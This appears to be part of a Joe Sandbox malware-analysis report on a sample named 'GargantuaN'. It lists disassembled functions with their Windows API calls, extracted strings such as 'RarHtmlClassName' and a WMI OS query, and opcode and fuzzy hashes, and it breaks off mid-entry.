                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                        • String ID: csm$csm$csm
                                                        • API String ID: 322700389-393685449
                                                        • Opcode ID: 0ce62f3313c0cbbe3869b9b3cb29120ea53a728c91cf2ad918781af4f2eb055b
                                                        • Instruction ID: 610e211813bd8ef89e1529de314aa42c8f4e4504cb2424349e2c74ff9fb9bb78
                                                        • Opcode Fuzzy Hash: 0ce62f3313c0cbbe3869b9b3cb29120ea53a728c91cf2ad918781af4f2eb055b
                                                        • Instruction Fuzzy Hash: 0AB14771D00249EFCF29DFA4C8819AEBBB5FF14310F58815AE8196B212E731DA51DBB1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D56FA5 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 134COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 00D56FAA
                                                        • _wcslen.LIBCMT ref: 00D57013
                                                        • _wcslen.LIBCMT ref: 00D57084
                                                          • Part of subcall function 00D57A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00D57AAB
                                                          • Part of subcall function 00D57A9C: GetLastError.KERNEL32 ref: 00D57AF1
                                                          • Part of subcall function 00D57A9C: CloseHandle.KERNEL32(?), ref: 00D57B00
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                        • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                        • API String ID: 3122303884-3508440684
                                                        • Opcode ID: f6413bcdc1eeef1a9c492c6aacce3ce436ef3fdcf030a0c44733b86e4048959c
                                                        • Instruction ID: e703ac4a71456649691fd21e1ff734bf0ae261ab678abdbc6cd4ac2933a9a0f1
                                                        • Opcode Fuzzy Hash: f6413bcdc1eeef1a9c492c6aacce3ce436ef3fdcf030a0c44733b86e4048959c
                                                        • Instruction Fuzzy Hash: 3E4114B1D08744AAEF20EB74AC82FEE776CDF04312F144455FE59A7182E670AA4C8731
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D69711 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 126memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _wcslen.LIBCMT ref: 00D69736
                                                        • _wcslen.LIBCMT ref: 00D697D6
                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 00D697E5
                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00D69806
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: _wcslen$AllocByteCharGlobalMultiWide
                                                        • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                        • API String ID: 1116704506-4209811716
                                                        • Opcode ID: 6c7a4f020848ac046482518805fb91cebc3f045ae501b9253a0b1616dda575a2
                                                        • Instruction ID: 5b6076c95d1a79f1d10f64c3cc70954b236b7e5269c4a75cdd25da6d9a2325c4
                                                        • Opcode Fuzzy Hash: 6c7a4f020848ac046482518805fb91cebc3f045ae501b9253a0b1616dda575a2
                                                        • Instruction Fuzzy Hash: 4F31F2325083127BE725AB249C46FAFB79CEF42720F18451EF505971D2FB749A0983B6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6B5C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00D51316: GetDlgItem.USER32(00000000,00003021), ref: 00D5135A
                                                          • Part of subcall function 00D51316: SetWindowTextW.USER32(00000000,00D835F4), ref: 00D51370
                                                        • EndDialog.USER32(?,00000001), ref: 00D6B610
                                                        • SendMessageW.USER32(?,00000080,00000001,?), ref: 00D6B637
                                                        • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00D6B650
                                                        • SetWindowTextW.USER32(?,?), ref: 00D6B661
                                                        • GetDlgItem.USER32(?,00000065), ref: 00D6B66A
                                                        • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00D6B67E
                                                        • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00D6B694
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Item$TextWindow$Dialog
                                                        • String ID: LICENSEDLG
                                                        • API String ID: 3214253823-2177901306
                                                        • Opcode ID: d8ef08957d324acc6e9a1e3436c6194b276d0a34c0e1a4776e5e9ca9badb7c33
                                                        • Instruction ID: c830f43047539546f791db01f4b2842a31cab4a3c3f5caaf251bf88dfa66c3e4
                                                        • Opcode Fuzzy Hash: d8ef08957d324acc6e9a1e3436c6194b276d0a34c0e1a4776e5e9ca9badb7c33
                                                        • Instruction Fuzzy Hash: DD21E532640305FBD2116FB6ED89F3B3B6DEB47BA1F050115F644DA2A0DB62D941E631
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6FD10 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,B818264F,00000001,00000000,00000000,?,?,00D5AF6C,ROOT\CIMV2), ref: 00D6FD99
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,00D5AF6C,ROOT\CIMV2), ref: 00D6FE14
                                                        • SysAllocString.OLEAUT32(00000000), ref: 00D6FE1F
                                                        • _com_issue_error.COMSUPP ref: 00D6FE48
                                                        • _com_issue_error.COMSUPP ref: 00D6FE52
                                                        • GetLastError.KERNEL32(80070057,B818264F,00000001,00000000,00000000,?,?,00D5AF6C,ROOT\CIMV2), ref: 00D6FE57
                                                        • _com_issue_error.COMSUPP ref: 00D6FE6A
                                                        • GetLastError.KERNEL32(00000000,?,?,00D5AF6C,ROOT\CIMV2), ref: 00D6FE80
                                                        • _com_issue_error.COMSUPP ref: 00D6FE93
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                        • String ID:
                                                        • API String ID: 1353541977-0
                                                        • Opcode ID: e2c0f02a5f0d42c478856a0f5e68cdfc04ef2fc0f0939ecbc028976e48792f5b
                                                        • Instruction ID: 5e2b6a2d3cb046fa5807b1a8012ff3f185778a56da34601c7429aa85a691ce5f
                                                        • Opcode Fuzzy Hash: e2c0f02a5f0d42c478856a0f5e68cdfc04ef2fc0f0939ecbc028976e48792f5b
                                                        • Instruction Fuzzy Hash: E241D871A00719AFDB109F68EC45BAEBBA8EF44B10F244239F919E7352D73599008BB5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D5AF24 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 210COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: H_prolog
                                                        • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                        • API String ID: 3519838083-3505469590
                                                        • Opcode ID: 564687130e6a5839afb76ac7866743608101bb20d46e1e1429c2ef6355fa30cd
                                                        • Instruction ID: da4aed02a5e3f82df31e5d107ae619050f7bad479f46d7dba4e96e7209abde97
                                                        • Opcode Fuzzy Hash: 564687130e6a5839afb76ac7866743608101bb20d46e1e1429c2ef6355fa30cd
                                                        • Instruction Fuzzy Hash: 1B714C71A00619AFDF14DFA8CC95AAEB7B9FF49711B140259F916E72A0CB30AD05CB70
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D59382 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 00D59387
                                                        • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00D593AA
                                                        • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00D593C9
                                                          • Part of subcall function 00D5C29A: _wcslen.LIBCMT ref: 00D5C2A2
                                                          • Part of subcall function 00D61FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00D5C116,00000000,.exe,?,?,00000800,?,?,?,00D68E3C), ref: 00D61FD1
                                                        • _swprintf.LIBCMT ref: 00D59465
                                                          • Part of subcall function 00D54092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D540A5
                                                        • MoveFileW.KERNEL32(?,?), ref: 00D594D4
                                                        • MoveFileW.KERNEL32(?,?), ref: 00D59514
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                        • String ID: rtmp%d
                                                        • API String ID: 3726343395-3303766350
                                                        • Opcode ID: 8ea35fff988fc0725baa76fce5f31f0b2f17a9a8e72737af43c460d057190cc4
                                                        • Instruction ID: 77da4e814b3f7c27473c1114fe25b5da6db58980c63feb111b99b5d3ccbcbecd
                                                        • Opcode Fuzzy Hash: 8ea35fff988fc0725baa76fce5f31f0b2f17a9a8e72737af43c460d057190cc4
                                                        • Instruction Fuzzy Hash: 4A415371900258AADF21ABA0CC55EDEB37CEF45741F0448A5BE49E3151EB388B9D8B74
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D61218 Relevance: 12.1, APIs: 8, Instructions: 125timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __aulldiv.LIBCMT ref: 00D6122E
                                                          • Part of subcall function 00D5B146: GetVersionExW.KERNEL32(?), ref: 00D5B16B
                                                        • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00D61251
                                                        • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00D61263
                                                        • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00D61274
                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00D61284
                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00D61294
                                                        • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 00D612CF
                                                        • __aullrem.LIBCMT ref: 00D61379
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                        • String ID:
                                                        • API String ID: 1247370737-0
                                                        • Opcode ID: 2837b9c322bdf9a6fe6ff6114032baf3115a23ae6a9712d301f4185fd6e6a44e
                                                        • Instruction ID: 53abd6ecd62a0d7dbe9ba7d91c37afe767df932463d1f0b69a771da4b2e647af
                                                        • Opcode Fuzzy Hash: 2837b9c322bdf9a6fe6ff6114032baf3115a23ae6a9712d301f4185fd6e6a44e
                                                        • Instruction Fuzzy Hash: DB4108B5508305AFC710DF65C88496BBBF9FF88714F14892EF59AC2210E734E649CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D52210 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 468COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _swprintf.LIBCMT ref: 00D52536
                                                          • Part of subcall function 00D54092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D540A5
                                                          • Part of subcall function 00D605DA: _wcslen.LIBCMT ref: 00D605E0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: __vswprintf_c_l_swprintf_wcslen
                                                        • String ID: ;%u$x%u$xc%u
                                                        • API String ID: 3053425827-2277559157
                                                        • Opcode ID: 1f9c74c0cc6a6a238673dada681dc6e0359e87e6898ce0be792edbedb5c74118
                                                        • Instruction ID: c666ccd9f2270a447a89f70840100484a2357e6446696b1b4dc2ef16dca1afb2
                                                        • Opcode Fuzzy Hash: 1f9c74c0cc6a6a238673dada681dc6e0359e87e6898ce0be792edbedb5c74118
                                                        • Instruction Fuzzy Hash: 88F146706043409BDF25EB2884D5BBE7B959F96301F0C056DECCA9B283CB64994DC7B2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D69CFE Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: _wcslen
                                                        • String ID: </p>$</style>$<br>$<style>$>
                                                        • API String ID: 176396367-3568243669
                                                        • Opcode ID: a88ec1498cfbff223767e859bbcc9c459417eaaf4338d276ccc7f75973916e4f
                                                        • Instruction ID: a324d48ae7a1a15d979e35c3230aa65f81e09f3dd03f065307345d6c7faef486
                                                        • Opcode Fuzzy Hash: a88ec1498cfbff223767e859bbcc9c459417eaaf4338d276ccc7f75973916e4f
                                                        • Instruction Fuzzy Hash: 6E51E66664132397DB309A259832776F3E8DFA1750F6C042AF9C18B1C1FB768C818771
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D7F68D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00D7FE02,00000000,00000000,00000000,00000000,00000000,?), ref: 00D7F6CF
                                                        • __fassign.LIBCMT ref: 00D7F74A
                                                        • __fassign.LIBCMT ref: 00D7F765
                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00D7F78B
                                                        • WriteFile.KERNEL32(?,00000000,00000000,00D7FE02,00000000,?,?,?,?,?,?,?,?,?,00D7FE02,00000000), ref: 00D7F7AA
                                                        • WriteFile.KERNEL32(?,00000000,00000001,00D7FE02,00000000,?,?,?,?,?,?,?,?,?,00D7FE02,00000000), ref: 00D7F7E3
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                        • String ID:
                                                        • API String ID: 1324828854-0
                                                        • Opcode ID: b2fc81b7b7d302cfc59796c5f5e9aecfd4ac279f1786c90db4a58c937181fd3b
                                                        • Instruction ID: bda4619a2c39d49afd26700e2239269493730673b62ff6b25c8522b647bd6fe8
                                                        • Opcode Fuzzy Hash: b2fc81b7b7d302cfc59796c5f5e9aecfd4ac279f1786c90db4a58c937181fd3b
                                                        • Instruction Fuzzy Hash: A45187B2D002499FCB24CFA8DC45AEEBBF4EF09710F14816AE559E7251E770A941CBB1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D72900 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _ValidateLocalCookies.LIBCMT ref: 00D72937
                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 00D7293F
                                                        • _ValidateLocalCookies.LIBCMT ref: 00D729C8
                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00D729F3
                                                        • _ValidateLocalCookies.LIBCMT ref: 00D72A48
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                        • String ID: csm
                                                        • API String ID: 1170836740-1018135373
                                                        • Opcode ID: 26b94bb236a5377da7c703f4f164cfb5814c8ccd2f79a2ad03c259d666cda7d1
                                                        • Instruction ID: 1251c5737ec28227cf1d1b4339b8be641150df999532c9587fbf86aa2647f58c
                                                        • Opcode Fuzzy Hash: 26b94bb236a5377da7c703f4f164cfb5814c8ccd2f79a2ad03c259d666cda7d1
                                                        • Instruction Fuzzy Hash: 3E41B630A00248AFCF10DF68C881AAE7BB5EF44324F18C156E959AB352E731DA45CFB1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D69ED5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ShowWindow.USER32(?,00000000), ref: 00D69EEE
                                                        • GetWindowRect.USER32(?,00000000), ref: 00D69F44
                                                        • ShowWindow.USER32(?,00000005,00000000), ref: 00D69FDB
                                                        • SetWindowTextW.USER32(?,00000000), ref: 00D69FE3
                                                        • ShowWindow.USER32(00000000,00000005), ref: 00D69FF9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: Window$Show$RectText
                                                        • String ID: RarHtmlClassName
                                                        • API String ID: 3937224194-1658105358
                                                        • Opcode ID: ff24540e4080d3a3f88706c9cb451784f7ce8e52f0017576da8b7dc3a4bc7478
                                                        • Instruction ID: d0616876f24a0ebad2eaaf7d7b27e4dbda69bc189d05656d24231b76ecc38ef8
                                                        • Opcode Fuzzy Hash: ff24540e4080d3a3f88706c9cb451784f7ce8e52f0017576da8b7dc3a4bc7478
                                                        • Instruction Fuzzy Hash: B341AF31104310EFCB219F68DC49B6BBBACEF48741F058659F849AA15ADB34D914DF71
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D69955 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: _wcslen
                                                        • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                        • API String ID: 176396367-3743748572
                                                        • Opcode ID: 9782399f7d7ff3e6b3c9976ab58fc6ec486547418d7582299a4bb69d0228fd9f
                                                        • Instruction ID: 6ebd1dc9ab77c59d0500fc3385cf04781026a29609c974fe20cfbebe68bd0887
